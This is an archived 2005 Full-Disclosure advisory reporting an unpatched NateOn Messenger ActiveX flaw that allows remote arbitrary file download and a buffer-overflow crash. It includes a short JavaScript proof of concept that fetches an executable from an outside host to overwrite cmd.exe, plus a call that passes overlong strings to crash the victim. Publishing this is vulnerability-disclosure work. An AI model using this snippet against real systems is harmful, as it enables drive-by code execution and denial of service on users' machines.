[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050929033435.80A62B20@lists.grok.org.uk>
Date: Thu Sep 29 04:34:43 2005
From: saintlinu at yahoo.co.kr (saintlinu)
Subject: [NRVA05-08] - Arbitrary file download by NateOn
Messagener's ActiveX and DoS
Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS
Discoverer: PARK, GYU TAE (saintlinu@...l2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS
Where: From remote
Operating System: Windows Only
Solution: unpatch yet
Workaround: N / A
Notice: 09. 17. 2005 Initiate notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't response. Disclosure
vulnerability
Description:
The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on
If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX
and there is another vulnerability like Buffer Overflow
See following detail describe:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
alert('NateOn Messenger already installed. Do
Attack ...');
// if you want to second order attack then try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');
// if you want to crash to victim system the try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');
} else {
alert('NateOn Messenger NOT Installed');
}
</--snip-->
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050929/dbac0a4b/attachment-0001.html
Powered by blists - more mailing lists